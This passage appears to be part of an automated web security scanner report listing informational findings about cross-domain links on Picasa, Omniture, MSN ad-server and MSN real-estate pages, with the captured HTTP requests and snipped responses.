<td id="lhid_trayhandle" class="gphoto-trayhandle
">
<img src="http://lh5.ggpht.com/s/v/71.12/img/transparent.gif" class="" id="lhid_trayhandle_icon" />
</td>
...[SNIP]...
</a> -
<a href="http://googlephotos.blogspot.com" target="_blank">Blog</a>
...[SNIP]...

17.154. https://picasaweb.google.com/lh/view previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://picasaweb.google.com
Path:	/lh/view

Issue detail

The page was loaded from a URL containing a query string:

https://picasaweb.google.com/lh/view?q=millenium+boston&um=1&ie=UTF-8&sa=N&hl=en&tab=wq

The response contains the following links to other domains:

https://lh3.googleusercontent.com/s/v/71.12/script/lh_searchview.js
https://lh4.googleusercontent.com/s/v/71.12/styles/lh.css
https://lh5.googleusercontent.com/s/v/71.12/img/logo/pwa-en_US.gif
https://lh5.googleusercontent.com/s/v/71.12/img/transparent.gif

Request

GET /lh/view?q=millenium+boston&um=1&ie=UTF-8&sa=N&hl=en&tab=wq HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Expires: Wed, 02 Feb 2011 15:38:34 GMT
Date: Wed, 02 Feb 2011 15:38:34 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=jKRMDSst7hV3; Path=/; Secure; HttpOnly
Set-Cookie: S=photos_html=mmKCAJhdhRuj6n4nORlxnQ; Domain=.google.com; Path=/; Secure; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
</style>
<link rel="stylesheet" type="text/css" href="https://lh4.googleusercontent.com/s/v/71.12/styles/lh.css" />
</head>
<body onload="_report();_onload();"
class="lhcl_lang_en_US goog-app
lhcl_googlephotos_body">
<script src="https://lh3.googleusercontent.com/s/v/71.12/script/lh_searchview.js"></script>
...[SNIP]...
<a href="/">
<img src="https://lh5.googleusercontent.com/s/v/71.12/img/logo/pwa-en_US.gif" id="lhid_logo" alt="Picasa Web Albums" /></a>
...[SNIP]...
<td id="lhid_trayhandle" class="gphoto-trayhandle
">
<img src="https://lh5.googleusercontent.com/s/v/71.12/img/transparent.gif" class="" id="lhid_trayhandle_icon" />
</td>
...[SNIP]...

17.155. http://pingomatic.com/ping/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pingomatic.com
Path:	/ping/

Issue detail

The page was loaded from a URL containing a query string:

http://pingomatic.com/ping/?title=Flyer&blogurl=b2932

The response contains the following link to another domain:

http://wordpressfoundation.org/

Request

Response

17.156. https://publish.omniture.com/center/util/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://publish.omniture.com
Path:	/center/util/

Issue detail

The page was loaded from a URL containing a query string:

https://publish.omniture.com/center/util/?sp_fn=send_password

The response contains the following link to another domain:

https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js

Request

GET /center/util/?sp_fn=send_password HTTP/1.1
Host: publish.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; v1stsp=C92D8F8B772AFF13; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 19:33:55 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 publish.omniture.com:88
X-Cache: MISS from publish.omniture.com
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Copyright (c) 2011 Adobe Systems Incorporated. All rights reser
...[SNIP]...
</table>

<script type="text/javascript" src="https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js"></script>
...[SNIP]...

17.157. http://rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNIF1&AP=1455

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N4492.MSN/B5014254.59;sz=1x1;ord=990462223?
http://ads2.msads.net/CIS/96/000/000/000/010/209.gif

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNIF1&AP=1455 HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.msn.com
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC00=FB=AgEAVQ5AiKgB; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 910
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8110121-T21144173-C83000000000035094
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 01 Feb 2011 15:22:47 GMT
Content-Length: 910

//<![CDATA[
function getRADIds() { return{"adid":"83000000000035094","pid":"8110121","targetid":"21144173"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 60);}
t
...[SNIP]...
<a href="http://g.msn.com/2AD0003R/83000000000035094.1??PID=8110121&UIT=G&TargetID=21144173&AN=990462223&PG=MSNIF1&ASID=0dd407b05c124b2a9594841e46d033d4" target="_blank"><img src="http://ads2.msads.net/CIS/96/000/000/000/010/209.gif" width="300" height="60" alt="Click Here!" border="0" /></a>');document.write('<img src="http://ad.doubleclick.net/ad/N4492.MSN/B5014254.59;sz=1x1;ord=990462223?" alt="" height="1" width="1" style="display:none;" />');
document.close();
//]]>
...[SNIP]...

17.158. http://rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&PG=SPTSN1&AP=1390

The response contains the following link to another domain:

http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.5;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003L/39000000000033052.1?!&&PID=8195414&UIT=G&TargetID=38194737&AN=17498803&PG=SPTSN1&ASID=2b7f8f040896431596e9eda158a970b9&destination=;ord=17498803?

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PG=SPTSN1&AP=1390 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2727
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: FC05=FB=AgEAaA4hwEQB; expires=Tue, 05-Feb-2013 12:00:00 GMT; domain=.rad.msn.com; path=/; HttpOnly
X-RADID: P8195414-T38194737-C39000000000033052
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 06 Feb 2011 14:17:32 GMT
Content-Length: 2727

//<![CDATA[
function getRADIds() { return{"adid":"39000000000033052","pid":"8195414","targetid":"38194737"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_17498803() {var adCode_17498803=new Array();adCode_17498803.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.5;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003L/39000000000033052.1?!&&PID=8195414&UIT=G&TargetID=38194737&AN=17498803&PG=SPTSN1&ASID=2b7f8f040896431596e9eda158a970b9&destination=;ord=17498803?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_17498803.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6036.149339.MICROSOFTONLINE/B5123903.5;abr=!ie;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/G
...[SNIP]...

17.159. http://rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNREC&AP=1089

The response contains the following link to another domain:

http://ads2.msads.net/CIS/91/000/000/000/012/505.gif

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNREC&AP=1089 HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.msn.com
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC00=FB=AgEAVQ5AiKgB; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 761
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P7677550-T38325430-C103000000000035350
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 01 Feb 2011 15:22:46 GMT
Content-Length: 761

//<![CDATA[
function getRADIds() { return{"adid":"103000000000035350","pid":"7677550","targetid":"38325430"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);}
...[SNIP]...
<a href="http://g.msn.com/2AD0003S/103000000000035350.1??PID=7677550&UIT=G&TargetID=38325430&AN=722094753&PG=MSNREC&ASID=1662e8add9b341479ef36695e2cf8ad4" target="_blank"><img src="http://ads2.msads.net/CIS/91/000/000/000/012/505.gif" width="300" height="250" alt="Click Here!" border="0" /></a>
...[SNIP]...

17.160. http://rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNHQ2&AP=1402

The response contains the following links to other domains:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/971.560.tk.100x25/318849087
http://ads2.msads.net/CIS/110/000/000/000/005/545.jpg

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNHQ2&AP=1402 HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.msn.com
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC00=FB=AgEAVQ5AiKgB; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 962
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8009941-T22841720-C83000000000035182
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 01 Feb 2011 15:22:48 GMT
Content-Length: 962

//<![CDATA[
function getRADIds() { return{"adid":"83000000000035182","pid":"8009941","targetid":"22841720"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 100, 25);}
t
...[SNIP]...
<a href="http://g.msn.com/2AD0003S/83000000000035182.1??PID=8009941&UIT=G&TargetID=22841720&AN=318849087&PG=MSNHQ2&ASID=591ca3a4890b472cbb4c6b782abce2d9" target="_blank"><img src="http://ads2.msads.net/CIS/110/000/000/000/005/545.jpg" width="100" height="25" alt="$7 Online Stock Trades! Click here to learn more!" border="0" /></a>');document.write('<img src="http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/971.560.tk.100x25/318849087" alt="" height="1" width="1" style="display:none;" />');
document.close();
//]]>
...[SNIP]...

17.161. http://rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=DC63BAA44C3843F38378B4BB213E0A6F&MUID=DC63BAA44C3843F38378B4BB213E0A6F&PG=INVNC6&AP=1025

The response contains the following links to other domains:

http://clk.redcated/BEL/go/262582811/direct;/01/
http://redcated/BEL/iview/262582811/direct;/01?click=
http://redcated/BEL/view/262582811/direct;/01/

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=DC63BAA44C3843F38378B4BB213E0A6F&MUID=DC63BAA44C3843F38378B4BB213E0A6F&PG=INVNC6&AP=1025 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2362
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8038176-T8335901-C107000000000040026
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 02 Feb 2011 21:46:50 GMT
Content-Length: 2362

//<![CDATA[
function getRADIds() { return{"adid":"107000000000040026","pid":"8038176","targetid":"8335901"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 30);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_437928926() {var adCode_437928926=new Array();adCode_437928926.push('<iframe src="http://view.atdmt.com/BEL/iview/262582811/direct;/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="120" height="30">\n');adCode_437928926.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_437928926.push('document.write(\'<a href="http://clk.atdmt.com/BEL/go/262582811/direct;/01/" target="_blank"><img src="http://view.atdmt.com/BEL/view/262582811/direct;/01/"/></a>
...[SNIP]...

17.162. http://rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNSUR&AP=1089

The response contains the following link to another domain:

http://ads1.msads.net/ads/1/0000000001_000000000000000017246.gif

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNSUR&AP=1089 HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.msn.com
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC00=FB=AgEAVQ5AiKgB; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 403
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P3782944-T8338642-C521263
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 01 Feb 2011 15:22:48 GMT
Content-Length: 403

//<![CDATA[
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 1, 1);}
document.write('<a href="http://g.msn.com/0AD00004/521263.1??PID=3782944&UIT=G&TargetID=8338642&AN=154338028&PG=MSNSUR" ><img src="http://ads1.msads.net/ads/1/0000000001_000000000000000017246.gif" width="1" height="1" alt="Click Here!" border="0" /></a>
...[SNIP]...

17.163. http://rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNHP4&AP=1455

The response contains the following link to another domain:

http://ads2.msads.net/CIS/34/000/000/000/012/082.jpg

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNHP4&AP=1455 HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.msn.com
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC00=FB=AgEAVQ5AiKgB; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 759
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8261546-T37763800-C95000000000042216
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 01 Feb 2011 15:22:50 GMT
Content-Length: 759

//<![CDATA[
function getRADIds() { return{"adid":"95000000000042216","pid":"8261546","targetid":"37763800"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 120);}

...[SNIP]...
<a href="http://g.msn.com/2AD0003P/95000000000042216.1??PID=8261546&UIT=G&TargetID=37763800&AN=1511672257&PG=MSNHP4&ASID=aa6dd9084e8442e8b8ffc0bf83c70e7e" target="_blank"><img src="http://ads2.msads.net/CIS/34/000/000/000/012/082.jpg" width="300" height="120" alt="Click Here!" border="0" /></a>
...[SNIP]...

17.164. http://realestate.msn.com/slideshow.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realestate.msn.com
Path:	/slideshow.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://realestate.msn.com/slideshow.aspx?cp-documentid=27434033

The response contains the following links to other domains:

http://cid-49901d2abfb26279.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-8097868aeb7be4b1.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://download.live.com/?sku=messenger
http://facebook.com/MSNRealEstate?ocid=TXT_MSNCH_REALESTATE_FollowMSN
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nba/story/Miami-Heat-buy-former-star-guard-Tim-Hardaway-mansion-012711
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalrealest.112.2o7.net/b/ss/msnportalrealest/1/H.1--NS/0
http://public.superlativestudio.com/IDXDetail.aspx?segmentid=1477012&mlstableid=UPLOAD&mlsnum=634111637732752924_39020&rid=0&uid=39020
http://realestate.msn.us.intellitxt.com/ast/js/msn/realestate.msn_cs.js
http://twitter.com/msnrealestate?ocid=TXT_MSNCH_REALESTATE_FollowMSN
http://us.social.s-msn.com/s/images/bluemannxl.png
http://www.bing.com/?form=SYNDRE
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=MSREAL
http://www.bing.com/search?q=Berkshire+Mountains&go=&form=MSREAL
http://www.bing.com/search?q=Fabrice+Tourre+cannot+delay+SEC+case&form=SYNDRE
http://www.bing.com/search?q=Housatonic+River&go=&form=MSREAL
http://www.bing.com/search?q=Louis+XIV&go=&form=MSREAL
http://www.bing.com/search?q=Mark+Hopkins+railroad&form=MSREAL
http://www.bing.com/search?q=McKim%2C+Mead+and+White&go=&form=MSREAL
http://www.bing.com/search?q=Renaissance+Fair&go=&form=MSREAL
http://www.bing.com/search?q=crenelated+walls&go=&form=MSREAL
http://www.bing.com/search?q=fannie+freddie+legal+fees+probe&form=SYNDRE
http://www.bing.com/search?q=hogwarts&form=MSREAL
http://www.bing.com/search?q=home+ownership+pre+boom&form=SYNDRE
http://www.bing.com/search?q=johnny+depp+venice&form=SYNDRE
http://www.bing.com/search?q=traveler%27s+rest+south+carolina&go=&form=MSREAL
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.dynamicupstate.com/
http://www.facebook.com/msnrealestate
http://www.mainstreet.com/?cm_ven=msmsnp
http://www.mainstreet.com/article/real-estate/buying/5-mortgage-trends-2011?cm_ven=msmsnp
http://www.mainstreet.com/article/real-estate/buying/it-time-buy-new-home?cm_ven=msmsnp
http://www.mainstreet.com/slideshow/real-estate/extreme-real-estate/live-pop-diva?cm_ven=msmsnp
http://www.mainstreet.com/slideshow/real-estate/extreme-real-estate/own-your-own-winter-resort?cm_ven=msmsnp
http://www.myhomemsn.com/
http://www.realestateresults.net/
http://www.realestateresults.net/castle.php
http://www.solarcastleforsale.com/index.html
http://www.staceymatthews.com/Properties/122908-H/122908-H.html
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661226&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Frealestate.msn.com%2Fslideshow.aspx%3Fcp-documentid%3D27434033&lc=1033&id=74430
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /slideshow.aspx?cp-documentid=27434033 HTTP/1.1
Host: realestate.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:40:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA08
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=52276d1a238e43e298b4cd8ae565e474; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=31159BA6A67444E38C1DFA5FE32D60E5; domain=.msn.com; expires=Sun, 21-Aug-2011 15:40:26 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 105109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
